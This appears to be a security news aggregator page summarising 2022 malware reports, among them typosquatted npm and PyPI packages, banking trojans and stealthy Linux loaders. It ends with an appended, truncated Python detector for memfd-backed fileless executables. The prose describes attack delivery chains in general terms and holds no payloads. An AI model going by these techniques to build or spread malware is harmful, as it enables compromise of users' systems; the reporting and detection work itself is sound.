A malicious NPM package has been found masquerading as the legitimate software library for Material Tailwind, once again indicating attempts on the part of threat actors to distribute malicious code in open source software repositories. Material Tailwind is a CSS-based framework advertised by its maintainers as an "easy to use components library for Tailwind CSS and Material Design." "The malicious Material Tailwind npm package, while posing as a helpful development tool, has an automatic post-install script," Karlo Zanki, security researcher at ReversingLabs, said in a report shared with The Hacker News. This script is engineered to download a password-protected ZIP archive file that contains a Windows executable capable of running PowerShell scripts. The rogue package, named material-tailwindcss, has been downloaded 320 times to date, all of which occurred on or after September 15, 2022. In a tactic that's becoming increasingly common, the threatThe Hacker News
September 22, 2022
ChromeLoader Campaign Spreads Several Malware Full Text
Abstract
The multi-stage malware attack chain hijacks the browser and redirects targets to advertising sites, for the threat actors to generate revenue from ad clicks and views.Cyware Alerts - Hacker News
September 20, 2022
IT giants warn of ongoing Chromeloader malware campaigns Full Text
Abstract
VMware and Microsoft are warning of a widespread Chromeloader malware campaign that distributes several malware families. ChromeLoader is a malicious Chrome browser extension, it is classified as a pervasive browser hijacker that modifies browser...Security Affairs
September 19, 2022
VMware, Microsoft warn of widespread Chromeloader malware attacks Full Text
Abstract
The operators of the Chromeloader adware are evolving their attack methods and gradually transforming the low-risk tool into a dangerous malware loader, seen dropping ransomware in some cases.BleepingComputer
September 16, 2022
Researchers Find Link b/w PrivateLoader and Ruzki Pay-Per-Install Services Full Text
Abstract
Cybersecurity researchers have exposed new connections between a widely used pay-per-install (PPI) malware service known as PrivateLoader and another PPI platform offered by a cybercriminal actor dubbed ruzki. "The threat actor ruzki (aka les0k, zhigalsz) advertises their PPI service on underground Russian-speaking forums and their Telegram channels under the name ruzki or zhigalsz since at least May 2021," SEKOIA said. The cybersecurity firm said its investigations into the twin services led it to conclude that PrivateLoader is the proprietary loader of the ruzki PPI malware service. PrivateLoader, as the name implies, functions as a C++-based loader to download and deploy additional malicious payloads on infected Windows hosts. It's primarily distributed through SEO-optimized websites that claim to provide cracked software. Although it was first documented earlier this February by Intel471, it's said to have been put to use starting as early as May 2021. SThe Hacker News
September 15, 2022
Hackers trojanize PuTTY SSH client to backdoor media company Full Text
Abstract
North Korean hackers are using trojanized versions of the PuTTY SSH client to deploy backdoors on targets' devices as part of a fake Amazon job assessment.BleepingComputer
September 15, 2022
Researchers Warn of Self-Spreading Malware Targeting Gamers via YouTube Full Text
Abstract
Gamers looking for cheats on YouTube are being targeted with links to malicious password-protected archive files designed to install the RedLine Stealer malware and crypto miners on compromised machines. "The videos advertise cheats and cracks and provide instructions on hacking popular games and software," Kaspersky security researcher Oleg Kupreev said in a new report published today. Games mentioned in the videos are APB Reloaded, CrossFire, DayZ, Farming Simulator, Farthest Frontier, FIFA 22, Final Fantasy XIV, Forza, Lego Star Wars, Sniper Elite, and Spider-Man, among others. Downloading the self-extracting RAR archive leads to the execution of Redline Stealer, a coin miner, as well as a number of other binaries that enable the bundle's self-propagation. Specifically, this is achieved by means of an open-source C#-based password stealer that's capable of extracting cookies from browsers, which is then used by the operators to gain unauthorized access toThe Hacker News
September 15, 2022
Experts warn of self-spreading malware targeting gamers looking for cheats on YouTube Full Text
Abstract
Threat actors target gamers looking for cheats on YouTube with the RedLine Stealer information-stealing malware and crypto miners Researchers from Kaspersky have spotted a self-extracting archive, served to gamers looking for cheats on YouTube, that...Security Affairs
September 15, 2022
New malware bundle self-spreads through YouTube gaming videos Full Text
Abstract
A new malware bundle uses victims' YouTube channels to upload malicious video tutorials advertising fake cheats and cracks for popular video games to spread the malicious package further.BleepingComputer
September 14, 2022
GIFShell, a New Tool to Abuse Microsoft Teams GIFs Full Text
Abstract
A cybersecurity consultant has discovered a new attack chain, GIFShell, that leverages GIF images in Microsoft Teams to execute arbitrary commands on the target’s machine. Since the data exfiltration is performed by leveraging Microsoft's own servers, it is challenging to identify the traffic and d ... Read MoreCyware Alerts - Hacker News
September 14, 2022
Researchers Detail OriginLogger RAT — Successor to Agent Tesla Malware Full Text
Abstract
Palo Alto Networks Unit 42 has detailed the inner workings of a malware called OriginLogger, which has been touted as a successor to the widely used information stealer and remote access trojan (RAT) known as Agent Tesla. A .NET based keylogger and remote access, Agent Tesla has had a long-standing presence in the threat landscape, allowing malicious actors to gain remote access to targeted systems and beacon sensitive information to an actor-controlled domain. Known to be used in the wild since 2014, it's advertised for sale on dark web forums and is generally distributed through malicious spam emails as an attachment. In February 2021, cybersecurity firm Sophos disclosed two new variants of the commodity malware (version 2 and 3) that featured capabilities to steal credentials from web browsers, email apps, and VPN clients, as well as use Telegram API for command-and-control. Now according to Unit 42 researcher Jeff White, what has been tagged as AgentTesla version 3The Hacker News
September 14, 2022
Researchers Discover New Linux Variant of ‘SideWalk’ Modular Backdoor Full Text
Abstract
This variant was deployed against a Hong Kong university in February 2021, the same university that had already been targeted by SparklingGoblin during the student protests in May 2020.ESET Security
September 14, 2022
Chinese hackers create Linux version of the SideWalk Windows malware Full Text
Abstract
State-backed Chinese hackers have developed a Linux variant for the SideWalk backdoor used against Windows systems belonging to targets in the academic sector.BleepingComputer
September 13, 2022
Evil Corp Deploys ServHelper Backdoor Via Custom-made Software Panel Full Text
Abstract
Researchers provided insights into TeslaGun, a never-seen-before software control panel, used by the TA505, aka Evil Corp, to deploy the ServHelper backdoor. The ServHelper backdoor, once downloaded, sets up reverse SSH tunnels that allow attackers to access the infected system via RDP. The threat ... Read MoreCyware Alerts - Hacker News
September 10, 2022
New Linux malware combines unusual stealth with a full suite of capabilities Full Text
Abstract
Dubbed Shikitega by the researchers at AT&T Alien Labs who discovered it, the malware is delivered through a multistage infection chain using polymorphic encoding. It also abuses legitimate cloud services to host command-and-control servers.ARS Technica
September 08, 2022
Bumblebee malware adds post-exploitation tool for stealthy infections Full Text
Abstract
A new version of the Bumblebee malware loader has been spotted in the wild, featuring a new infection chain that uses the PowerSploit framework for stealthy reflective injection of a DLL payload into memory.BleepingComputer
September 7, 2022
Experts spotted a new stealthy Linux malware dubbed Shikitega Full Text
Abstract
A new Linux malware dubbed Shikitega leverages a multi-stage infection chain to target endpoints and IoT devices. Researchers from AT&T Alien Labs discovered a new piece of stealthy Linux malware, dubbed Shikitega, that targets endpoints and IoT devices....Security Affairs
September 7, 2022
Malware in House of the Dragon downloads Full Text
Abstract
Cybercriminals abuse popular TV shows for their reach. The criminals load illegal downloads with malware and upload them to torrent and file-sharing websites. House of the Dragon is the latest such show to be targeted.Cyberwarzone
September 07, 2022
New Stealthy Shikitega Malware Targeting Linux Systems and IoT Devices Full Text
Abstract
A new piece of stealthy Linux malware called Shikitega has been uncovered adopting a multi-stage infection chain to compromise endpoints and IoT devices and deposit additional payloads. "An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist," AT&T Alien Labs said in a new report published Tuesday. The findings add to a growing list of Linux malware that has been found in the wild in recent months, including BPFDoor, Symbiote, Syslogk, OrBit, and Lightning Framework. Once deployed on a targeted host, the attack chain downloads and executes Metasploit's "Mettle" meterpreter to maximize control, exploits vulnerabilities to elevate its privileges, adds persistence on the host via crontab, and ultimately launches a cryptocurrency miner on infected devices. The exact method by which the initial compromise is achieved remains unknown as yet, but what makes ShikitegaThe Hacker News
September 6, 2022
A new Android malware used to spy on the Uyghur Community Full Text
Abstract
Experts spotted new Android spyware that was used by China-linked threat actors to spy on the Uyghur community in China. Researchers from Cyble Research & Intelligence Labs (CRIL) started their investigation after MalwareHunterTeam experts shared...Security Affairs
September 06, 2022
Minecraft is hackers’ favorite game title for hiding malware Full Text
Abstract
Security researchers have discovered that Minecraft is the most heavily abused game title by cybercriminals, who use it to lure unsuspecting players into installing malware.BleepingComputer
September 6, 2022
New Stealthy Malware Dubbed Shikitega Targeting Linux Systems Full Text
Abstract
The malware downloads and executes Metasploit's "Mettle" meterpreter to maximize its control of infected machines. Shikitega exploits system vulnerabilities to gain high privileges, persist, and execute a cryptominer.AT&T Cybersecurity
September 06, 2022
New Linux malware evades detection using multi-stage deployment Full Text
Abstract
A new stealthy Linux malware known as Shikitega has been discovered infecting computers and IoT devices with additional payloads.BleepingComputer
September 05, 2022
Fake Antivirus and Cleaner Apps Caught Installing SharkBot Android Banking Trojan Full Text
Abstract
The notorious Android banking trojan known as SharkBot has once again made an appearance on the Google Play Store by masquerading as antivirus and cleaner apps. "This new dropper doesn't rely on Accessibility permissions to automatically perform the installation of the dropper Sharkbot malware," NCC Group's Fox-IT said in a report. "Instead, this new version asks the victim to install the malware as a fake update for the antivirus to stay protected against threats." The apps in question, Mister Phone Cleaner and Kylhavy Mobile Security, have over 60,000 installations between them and are designed to target users in Spain, Australia, Poland, Germany, the U.S., and Austria: Mister Phone Cleaner (com.mbkristine8.cleanmaster, 50,000+ downloads) and Kylhavy Mobile Security (com.kylhavy.antivirus, 10,000+ downloads). The droppers are designed to drop a new version of SharkBot, dubbed V2 by Dutch security firm ThreatFabric, which features an updated co...The Hacker News
September 5, 2022
A new SharkBot variant bypassed Google Play checks again Full Text
Abstract
Experts spotted an upgraded version of the SharkBot malware that was uploaded to the official Google Play Store. Fox IT researchers have spotted an upgraded version of a SharkBot dropper that was uploaded to the official Google Play Store. While...Security Affairs
September 5, 2022
New SharkBot Banking Trojan Variant Bypassed Google Play Store Checks Again Full Text
Abstract
The malware was observed targeting the mobile users of banks in Italy, the UK, and the US. The trojan allows attackers to hijack users' mobile devices and steal funds from online banking and cryptocurrency accounts.Security Affairs
September 04, 2022
SharkBot malware sneaks back on Google Play to steal your logins Full Text
Abstract
A new and upgraded version of the SharkBot malware has returned to Google's Play Store, targeting banking logins of Android users through apps that have tens of thousands of installations.BleepingComputer
September 4, 2022
Alleged Iranian threat actors leak the code of their CodeRAT malware Full Text
Abstract
The author of the remote access trojan (RAT) CodeRAT has leaked the source code of its malware on GitHub. The development team behind the remote access trojan (RAT) CodeRAT has leaked the source code of its malware on GitHub after the SafeBreach...Security Affairs
September 03, 2022
Malware dev open-sources CodeRAT after being exposed Full Text
Abstract
The source code of a remote access trojan (RAT) dubbed 'CodeRAT' has been leaked on GitHub after malware analysts confronted the developer about attacks that used the tool.BleepingComputer
September 2, 2022
The Prynt Stealer malware contains a secret backdoor. Crooks steal data from other cybercriminals Full Text
Abstract
The information-stealing malware Prynt Stealer contains a backdoor that allows stealing the data it has infiltrated from victims. Zscaler researchers discovered a Telegram channel-based backdoor in the information-stealing malware Prynt Stealer, which...Security Affairs
September 02, 2022
Dev backdoors own malware to steal data from other hackers Full Text
Abstract
Cybercriminals using Prynt Stealer to collect data from victims are being swindled by the malware developer, who also receives a copy of the info over Telegram messaging service.BleepingComputer
September 02, 2022
Prynt Stealer Contains a Backdoor to Steal Victims’ Data Stolen by Other Cybercriminals Full Text
Abstract
Researchers discovered a private Telegram channel-based backdoor in the information stealing malware, dubbed Prynt Stealer, which its developer added with the intention of secretly stealing a copy of victims' exfiltrated data when used by other cybercriminals. "While this untrustworthy behavior is nothing new in the world of cybercrime, the victims' data end up in the hands of multiple threat actors, increasing the risks of one or more large scale attacks to follow," Zscaler ThreatLabz researchers Atinderpal Singh and Brett Stone-Gross said in a new report. Prynt Stealer, which came to light earlier this April, comes with capabilities to log keystrokes, steal credentials from web browsers, and siphon data from Discord and Telegram. It's sold for $100 for a one-month license and $900 for a lifetime subscription. The cybersecurity firm's analysis of Prynt Stealer shows that its codebase is derived from two other open source malware families, AsyncRAT and...The Hacker News
September 02, 2022
New Evidence Links Raspberry Robin Malware to Dridex and Russian Evil Corp Hackers Full Text
Abstract
Researchers have identified functional similarities between a malicious component used in the Raspberry Robin infection chain and a Dridex malware loader, further strengthening the operators' connections to the Russia-based Evil Corp group. The findings suggest that "Evil Corp is likely using Raspberry Robin infrastructure to carry out its attacks," IBM Security X-Force researcher Kevin Henson said in a Thursday analysis. Raspberry Robin (aka QNAP Worm), first discovered by cybersecurity company Red Canary in September 2021, has remained something of a mystery for nearly a year, partly owing to the noticeable lack of post-exploitation activities in the wild. That changed in July 2022 when Microsoft revealed that it observed the FakeUpdates (aka SocGholish) malware being delivered via existing Raspberry Robin infections, with potential connections identified between DEV-0206 and DEV-0243 (aka Evil Corp). The malware is known to be delivered from a compromised...The Hacker News
August 31, 2022
Experts Find Malicious Cookie Stuffing Chrome Extensions Used by 1.4 Million Users Full Text
Abstract
Five imposter extensions for the Google Chrome web browser masquerading as Netflix viewers and others have been found to track users' browsing activity and profit off retail affiliate programs. "The extensions offer various functions such as enabling users to watch Netflix shows together, website coupons, and taking screenshots of a website," McAfee researchers Oliver Devane and Vallabh Chole said. "The latter borrows several phrases from another popular extension called GoFullPage." The browser add-ons in question – available via the Chrome Web Store and downloaded 1.4 million times – are as follows: Netflix Party (mmnbenehknklpbendgmgngeaignppnbe), 800,000 downloads; Netflix Party (flijfnhifgdcbhglkneplegafminjnhn), 300,000 downloads; FlipShope – Price Tracker Extension (adikhbfjdbjkhelbdnffogkobkekkkej), 80,000 downloads; Full Page Screenshot Capture – Screenshotting (pojgkmkfincpdkdgjepkmdekcahmckjp), 200,000 downloads; AutoBuy Flash Sales (gbna...The Hacker News
August 31, 2022
Hackers Hide Malware in Stunning Images Taken by James Webb Space Telescope Full Text
Abstract
A persistent Golang-based malware campaign dubbed GO#WEBBFUSCATOR has leveraged the deep field image taken from NASA's James Webb Space Telescope (JWST) as a lure to deploy malicious payloads on infected systems. The development, revealed by Securonix, points to the growing adoption of Go among threat actors, given the programming language's cross-platform support, effectively allowing the operators to leverage a common codebase to target different operating systems. Go binaries also have the added benefit of rendering reverse engineering a lot more challenging as opposed to malware written in other languages like C++ or C#, not to mention prolonging analysis and detection attempts. Phishing emails containing a Microsoft Office attachment act as the entry point for the attack chain that, when opened, retrieves an obfuscated VBA macro, which, in turn, is auto-executed should the recipient enable macros. The execution of the macro results in the download of an image file...The Hacker News
August 31, 2022
GO#WEBBFUSCATOR campaign hides malware in NASA’s James Webb Space Telescope image Full Text
Abstract
A malware campaign tracked as GO#WEBBFUSCATOR used an image taken from NASA's James Webb Space Telescope (JWST) as a lure. Securonix Threat researchers uncovered a persistent Golang-based malware campaign tracked as GO#WEBBFUSCATOR that leveraged...Security Affairs
August 31, 2022
Experts spotted five malicious Google Chrome extensions used by 1.4M users Full Text
Abstract
Researchers spotted 5 malicious Google Chrome extensions used to track users' browsing activity and profit off retail affiliate programs. McAfee researchers discovered five malicious Google Chrome extensions with a total install base of over 1,400,000....Security Affairs
August 30, 2022
Hackers hide malware in James Webb telescope images Full Text
Abstract
Threat analysts have spotted a new malware campaign dubbed 'GO#WEBBFUSCATOR' that relies on phishing emails, malicious documents, and space images from the James Webb telescope to spread malware.BleepingComputer
August 30, 2022
A study on malicious plugins in WordPress Marketplaces Full Text
Abstract
A group of researchers from the Georgia Institute of Technology discovered malicious plugins on tens of thousands of WordPress sites. A team of researchers from the Georgia Institute of Technology has analyzed the backups of more than 400,000 unique...Security Affairs
August 30, 2022
Chrome extensions with 1.4 million installs steal browsing data Full Text
Abstract
Threat analysts at McAfee found five Google Chrome extensions that track users' browsing activity. Collectively, the extensions have been downloaded more than 1.4 million times.BleepingComputer
August 29, 2022
Nitrokod crypto miner infected systems across 11 countries since 2019 Full Text
Abstract
Researchers spotted a Turkish-based crypto miner malware campaign, tracked as Nitrokod, which infected systems across 11 countries. Check Point researchers discovered a Turkish-based crypto miner malware campaign, dubbed Nitrokod, which infected machines...Security Affairs
August 29, 2022
Windows malware delays coinminer install by a month to evade detection Full Text
Abstract
A new malware campaign disguised as Google Translate or MP3 downloader programs was found distributing cryptocurrency mining malware across 11 countries.BleepingComputer
August 29, 2022
Malware Found In India Supreme Court Snooping Investigation Full Text
Abstract
An investigation into the alleged use of Pegasus spyware on Indian citizens identified malware on five of the 29 volunteers who submitted their devices for forensic examination.Bank Info Security
August 27, 2022
Fake ‘Cthulhu World’ P2E project used to push info-stealing malware Full Text
Abstract
Hackers have created a fake 'Cthulhu World' play-to-earn community, including websites, Discord groups, social accounts, and a Medium developer site, to distribute the Raccoon Stealer, AsyncRAT, and RedLine password-stealing malware infections on unsuspecting victims.BleepingComputer
August 25, 2022
Microsoft Uncovers New Post-Compromise Malware Used by Nobelium Hackers Full Text
Abstract
The threat actor behind the SolarWinds supply chain attack has been linked to yet another "highly targeted" post-exploitation malware that could be used to maintain persistent access to compromised environments. Dubbed MagicWeb by Microsoft's threat intelligence teams, the development reiterates Nobelium's commitment to developing and maintaining purpose-built capabilities. Nobelium is the tech giant's moniker for a cluster of activities that came to light with the sophisticated attack targeting SolarWinds in December 2020, and which overlaps with the Russian nation-state hacking group widely known as APT29, Cozy Bear, or The Dukes. "Nobelium remains highly active, executing multiple campaigns in parallel targeting government organizations, non-governmental organizations (NGOs), intergovernmental organizations (IGOs), and think tanks across the US, Europe, and Central Asia," Microsoft said. MagicWeb, which shares similarities with another t...The Hacker News
August 25, 2022
Microsoft: Russian malware hijacks ADFS to log in as anyone in Windows Full Text
Abstract
Microsoft has discovered a new malware used by the Russian hacker group APT29 (a.k.a. NOBELIUM, Cozy Bear) that enables authentication as anyone in a compromised network.BleepingComputer
August 24, 2022
Hackers Using Fake DDoS Protection Pages to Distribute Malware Full Text
Abstract
WordPress sites are being hacked to display fraudulent Cloudflare DDoS protection pages that lead to the delivery of malware such as NetSupport RAT and Raccoon Stealer. "A recent surge in JavaScript injections targeting WordPress sites has resulted in fake DDoS prevent prompts which lead victims to download remote access trojan malware," Sucuri's Ben Martin said in a write-up published last week. Distributed denial-of-service (DDoS) protection pages are essential browser verification checks designed to deter bot-driven unwanted and malicious traffic from eating up bandwidth and taking down websites. The new attack vector involves hijacking WordPress sites to display fake DDoS protection pop-ups that, when clicked, ultimately lead to the download of a malicious ISO file ("security_install.iso") to the victim's systems. This is achieved by injecting three lines of code into a JavaScript file ("jquery.min.js"), or alternatively into the active...The Hacker News
August 24, 2022
Fake Chrome extension ‘Internet Download Manager’ has 200,000 installs Full Text
Abstract
Google Chrome extension 'Internet Download Manager' installed by more than 200,000 users is adware. The extension has been sitting on the Chrome Web Store since at least June 2019, according to the earliest reviews posted by users.BleepingComputer
August 23, 2022
Pirated 3DMark benchmark tool delivering info-stealer malware Full Text
Abstract
Cybersecurity researchers have discovered multiple ongoing malware distribution campaigns that target internet users who seek to download copies of pirated software.BleepingComputer
August 23, 2022
XCSSET Malware Updates with Python 3 to Target macOS Monterey Users Full Text
Abstract
The operators of the XCSSET macOS malware have upped the stakes by making iterative improvements that add support for macOS Monterey by upgrading its source code components to Python 3. "The malware authors have changed from hiding the primary executable in a fake Xcode.app in the initial versions in 2020 to a fake Mail.app in 2021 and now to a fake Notes.app in 2022," SentinelOne researchers Phil Stokes and Dinesh Devadoss said in a report. XCSSET, first documented by Trend Micro in 2020, has many moving parts that allow it to harvest sensitive information from Apple Notes, WeChat, Skype, and Telegram; inject malicious JavaScript code into various websites; and dump cookies from Safari web browser. Infection chains entail using a dropper to compromise users' Xcode projects with the backdoor, with the latter also taking steps to evade detection by masquerading as either system software or the Google Chrome web browser application. The primary executable is an...The Hacker News
August 23, 2022
Counterfeit versions of popular mobile devices target WhatsApp and WhatsApp Business Full Text
Abstract
Experts found backdoors in budget Android device models designed to target WhatsApp and WhatsApp Business messaging apps. Researchers from Doctor Web discovered backdoors in the system partition of budget Android device models that are counterfeit...Security Affairs
August 22, 2022
Researchers Find Counterfeit Phones with Backdoor to Hack WhatsApp Accounts Full Text
Abstract
Budget Android device models that are counterfeit versions associated with popular smartphone brands are harboring multiple trojans designed to target WhatsApp and WhatsApp Business messaging apps. The trojans, which Doctor Web first came across in July 2022, were discovered in the system partition of at least four different smartphones: P48pro, radmi note 8, Note30u, and Mate40. "These incidents are united by the fact that the attacked devices were copycats of famous brand-name models," the cybersecurity firm said in a report published today. "Moreover, instead of having one of the latest OS versions installed on them with the corresponding information displayed in the device details (for example, Android 10), they had the long outdated 4.4.2 version." Specifically, the tampering concerns two files, "/system/lib/libcutils.so" and "/system/lib/libmtd.so", that are modified in such a manner that when the libcutils.so system library is us...The Hacker News
August 22, 2022
Meet Borat RAT, a New Unique Triple Threat Full Text
Abstract
Atlanta-based cyber risk intelligence company, Cyble discovered a new Remote Access Trojan (RAT) malware. What makes this particular RAT malware distinct enough to be named after the comic creation of Sacha Baron Cohen? RAT malware typically helps cybercriminals gain complete control of a victim's system, permitting them to access network resources, files, and power to toggle the mouse and keyboard. Borat RAT malware goes beyond the standard features and enables threat actors to deploy ransomware and DDoS attacks. It also increases the number of threat actors who can launch attacks, sometimes appealing to the lowest common denominator. The added functionality of carrying out DDoS attacks makes it insidious and a risk to today's digital organizations. Ransomware has been the most common top attack type for over three years. According to an IBM report, REvil was the most common ransomware strain, consisting of about 37% of all ransomware attacks. Borat RAT is a unique...The Hacker News
August 22, 2022
Escanor Malware delivered in Weaponized Microsoft Office Documents Full Text
Abstract
Researchers spotted a new RAT (Remote Administration Tool) advertised on the Dark Web and Telegram called Escanor. Resecurity, a Los Angeles-based cybersecurity company protecting Fortune 500 worldwide, identified a new RAT (Remote Administration Tool)...Security Affairs
August 22, 2022
Escanor malware delivered in weaponized Microsoft Office documents Full Text
Abstract
The threat actors offer Android-based and PC-based versions of the RAT, along with an HVNC module and an exploit builder to weaponize Microsoft Office and Adobe PDF documents to deliver malicious code.Help Net Security
August 22, 2022
Donot Team cyberespionage group updates its Windows malware framework Full Text
Abstract
The Donot Team threat actor, aka APT-C-35, has added new capabilities to its Jaca Windows malware framework. The Donot Team has been active since 2016, it focuses on government and military organizations, ministries of foreign affairs, and embassies...Security Affairs
August 22, 2022
Disk wiping malware knows no borders Full Text
Abstract
Fortinet announced the latest semiannual FortiGuard Labs Global Threat Landscape Report which revealed that ransomware threat continues to adapt with more variants enabled by Ransomware-as-a-Service (RaaS).Help Net Security
August 21, 2022
Grandoreiro banking malware targets Mexico and Spain Full Text
Abstract
A new Grandoreiro banking malware campaign is targeting organizations in Mexico and Spain, Zscaler reported. Zscaler ThreatLabz researchers observed a Grandoreiro banking malware campaign targeting organizations in the Spanish-speaking nations of Mexico...Security Affairs
August 19, 2022
241 npm and PyPI packages caught dropping Linux cryptominers Full Text
Abstract
More than 200 malicious packages were discovered infiltrating the PyPI and npm open source registries this week. These packages are largely typosquats of widely used libraries, and each one of them downloads a Bash script on Linux systems that runs cryptominers.BleepingComputer
August 19, 2022
Grandoreiro banking malware targets manufacturers in Spain, Mexico Full Text
Abstract
The notorious 'Grandoreiro' banking trojan was spotted in recent attacks targeting employees of a chemicals manufacturer in Spain and workers of automotive and machinery makers in Mexico.BleepingComputer
August 18, 2022
Researchers Detail Evasive DarkTortilla Crypter Used to Deliver Malware Full Text
Abstract
A .NET-based evasive crypter named DarkTortilla has been used by threat actors to distribute a broad array of commodity malware as well as targeted payloads like Cobalt Strike and Metasploit, likely since 2015. "It can also deliver 'add-on packages' such as additional malicious payloads, benign decoy documents, and executables," cybersecurity firm Secureworks said in a Wednesday report. "It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging." Malware delivered by the crypter includes information stealers and remote access trojans (RATs) such as Agent Tesla, AsyncRat, NanoCore, and RedLine Stealer. "DarkTortilla has versatility that similar malware does not," the researchers noted. Crypters are software tools that use a combination of encryption, obfuscation, and code manipulation of malware so as to bypass detection by security solutions. The delivery of DarkTortil...The Hacker News
August 18, 2022
Android malware apps with 2 million installs found on Google Play Full Text
Abstract
A new batch of thirty-five Android malware apps that display unwanted advertisements was found on the Google Play Store, with the apps installed over 2 million times on victims' mobile devices.BleepingComputer
August 17, 2022
Bugdrop dropper includes features to circumvent Google’s security Controls Full Text
Abstract
Researchers have discovered a previously undocumented Android dropper, dubbed BugDrop, that's still under development. Recently, researchers from ThreatFabric discovered a previously undetected Android dropper, dubbed BugDrop, which is under active...Security Affairs
August 17, 2022
Malicious PyPi packages turn Discord into password-stealing malware Full Text
Abstract
A dozen malicious PyPi packages have been discovered installing malware that modifies the Discord client to become an information-stealing backdoor and steals data from web browsers and Roblox.BleepingComputer
August 17, 2022
Malware devs already bypassed Android 13’s new security feature Full Text
Abstract
Android malware developers are already adjusting their tactics to bypass a new 'Restricted settings' security feature introduced by Google in the newly released Android 13.BleepingComputer
August 17, 2022
Malicious Browser Extensions Targeted Over a Million Users So Far This Year Full Text
Abstract
More than 1.31 million users attempted to install malicious or unwanted web browser extensions at least once, new findings from cybersecurity firm Kaspersky show. "From January 2020 to June 2022, more than 4.3 million unique users were attacked by adware hiding in browser extensions, which is approximately 70% of all users affected by malicious and unwanted add-ons," the company said. As many as 1,311,557 users fall under this category in the first half of 2022, per Kaspersky's telemetry data. In comparison, the number of such users peaked in 2020 at 3,660,236, followed by 1,823,263 unique users in 2021. The most prevalent threat is a family of adware called WebSearch, which masquerades as PDF viewers and other utilities and comes with capabilities to collect and analyze search queries and redirect users to affiliate links. WebSearch is also notable for modifying the browser's start page, which contains a search engine and a number of links to third-party sour...The Hacker News
August 16, 2022
Malicious browser extensions targeted almost 7 million people Full Text
Abstract
Almost 7 million users have attempted to install malicious browser extensions since 2020, with 70% of those extensions used as adware to target users with advertisements.BleepingComputer
August 15, 2022
SOVA Android Banking Trojan Returns With New Capabilities and Targets Full Text
Abstract
The SOVA Android banking trojan is continuing to be actively developed with upgraded capabilities to target no less than 200 mobile applications, including banking apps and crypto exchanges and wallets, up from 90 apps when it started out. That's according to the latest findings from Italian cybersecurity firm Cleafy, which found newer versions of the malware sporting functionality to intercept two-factor authentication (2FA) codes, steal cookies, and expand its targeting to cover Australia, Brazil, China, India, the Philippines, and the U.K. SOVA, meaning Owl in Russian, came to light in September 2021 when it was observed striking financial and shopping apps from the U.S. and Spain for harvesting credentials through overlay attacks by taking advantage of Android's Accessibility services. In less than a year, the trojan has also acted as a foundation for another Android malware called MaliBot that's designed to target online banking and cryptocurrency wallet custo...The Hacker News
August 15, 2022
SOVA Android malware now also encrypts victims’ files Full Text
Abstract
Security researchers from Cleafy reported that the SOVA Android banking malware is back and is rapidly evolving. The SOVA Android banking trojan was improved, it has a new ransomware feature that encrypts files on Android devices, Cleafy researchers...Security Affairs
August 15, 2022
A new PyPI Package was found delivering fileless Linux Malware Full Text
Abstract
Security researchers discovered a new PyPI package designed to drop a fileless cryptominer on Linux systems. Sonatype researchers have discovered a new PyPI package named 'secretslib' that drops a fileless cryptominer into the memory of Linux systems....Security Affairs
August 14, 2022
Newly Uncovered PyPI Package Drops Fileless Cryptominer to Linux Systems Full Text
Abstract
A now-removed rogue package pushed to the official third-party software repository for Python has been found to deploy cryptominers on Linux systems. The module, named "secretslib" and downloaded 93 times prior to its deletion, was released to the Python Package Index (PyPI) on August 6, 2022 and is described as "secrets matching and verification made easy." "On a closer inspection though, the package covertly runs cryptominers on your Linux machine in-memory (directly from your RAM), a technique largely employed by fileless malware and crypters," Sonatype researcher Ax Sharma disclosed in a report last week. It achieves this by executing a Linux executable file retrieved from a remote server post installation, whose main task is to drop an ELF file ("memfd") directly in memory that functions as a Monero cryptominer, after which it gets deleted by the "secretslib" package. "The malicious activity leaves little to n...The Hacker News
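The "memfd" detail above is the tell for this class of fileless execution: an ELF written into an anonymous memfd_create(2) file and executed from there has no path on disk, so /proc/<pid>/exe resolves to "/memfd:<name> (deleted)" instead of a filesystem path, and the same "/memfd:" prefix shows up in /proc/<pid>/maps when an on-disk loader maps an in-memory payload. The scanner below is an added example for this page, not code from Sonatype's report or the secretslib package; it assumes only that standard procfs layout. It takes the proc root as a parameter so it can be run against a constructed tree, and build_sample_proc() builds that fixture (fake pids, paths and maps lines, not a real capture).

```python
"""Hunt for memfd-backed (in-memory) executables via /proc.

Added example, not code from Sonatype or secretslib. Assumes the standard
procfs layout: /proc/<pid>/exe -> "/memfd:<name> (deleted)" for an image
executed from a memfd, and "/memfd:" pathnames in /proc/<pid>/maps.
"""
import os
import re
import tempfile
from dataclasses import dataclass, field
from typing import List, Optional

# The kernel names memfd inodes "/memfd:<name>"; readlink on exe appends
# " (deleted)" because the inode has no directory entry.
MEMFD_RE = re.compile(r"^/memfd:(?P<name>.*?)(?: \(deleted\))?$")


@dataclass
class Finding:
    pid: int
    exe_target: str
    memfd_name: Optional[str]        # None when exe itself is on disk
    memfd_mappings: List[str] = field(default_factory=list)


def classify_exe_target(target: str) -> Optional[str]:
    """Return the memfd name if `target` is a memfd-backed image, else None."""
    m = MEMFD_RE.match(target)
    return m.group("name") if m else None


def memfd_mappings(maps_text: str) -> List[str]:
    """Collect pathnames of memfd-backed mappings from a /proc/<pid>/maps dump."""
    paths = []
    for line in maps_text.splitlines():
        # address perms offset dev inode [pathname]
        parts = line.split(None, 5)
        if len(parts) == 6 and parts[5].startswith("/memfd:"):
            paths.append(parts[5])
    return paths


def scan_proc(proc_root: str = "/proc") -> List[Finding]:
    """Return one Finding per process whose exe or mappings are memfd-backed."""
    findings: List[Finding] = []
    for entry in sorted(os.listdir(proc_root)):
        if not entry.isdigit():
            continue
        pid_dir = os.path.join(proc_root, entry)
        try:
            exe_target = os.readlink(os.path.join(pid_dir, "exe"))
        except OSError:
            continue  # kernel thread, process already gone, or no privilege
        try:
            with open(os.path.join(pid_dir, "maps")) as fh:
                mappings = memfd_mappings(fh.read())
        except OSError:
            mappings = []
        name = classify_exe_target(exe_target)
        if name is not None or mappings:
            findings.append(Finding(int(entry), exe_target, name, mappings))
    return findings


def build_sample_proc() -> str:
    """Construct a fake proc tree (fixture data, not a real capture)."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    samples = {
        # pid: (exe symlink target, maps content)
        "1": ("/usr/lib/systemd/systemd",
              "5570-5580 r-xp 00000000 08:01 1234 /usr/lib/systemd/systemd\n"),
        # whole image executed from a memfd, as an in-memory miner would be
        "4242": ("/memfd:secretslib (deleted)",
                 "5600-5610 r-xp 00000000 00:01 99 /memfd:secretslib (deleted)\n"
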